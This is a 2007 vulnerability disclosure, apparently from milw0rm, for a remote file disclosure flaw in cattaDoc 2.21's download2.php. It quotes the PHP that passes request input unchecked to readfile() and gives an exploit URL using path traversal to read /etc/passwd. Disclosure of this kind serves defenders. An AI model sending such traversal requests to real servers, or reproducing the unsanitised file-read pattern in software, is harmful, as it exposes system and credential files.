Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CVE-2007-1871: Cross site scripting in chcounter 3.1.3

E107 - (v0.7.8) Access Escalation Vulnerbility - PoC

Critical phpwiki c99shell exploit

CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From:	GolD_M <hacker__(at)_w.cn>
Date:	12.04.2007
Subject:	cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability

# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
# D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code:
##############################################################
# $tp = $_REQUEST['mtp'];                                    #
# $ofn = '"'.$_REQUEST['fn2'].'"';                           #
# header("Content-type: $tp");                               #
# header("Content-Disposition: attachment; filename=$ofn");  #
# readfile($_REQUEST['fn1']); <<----                         #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]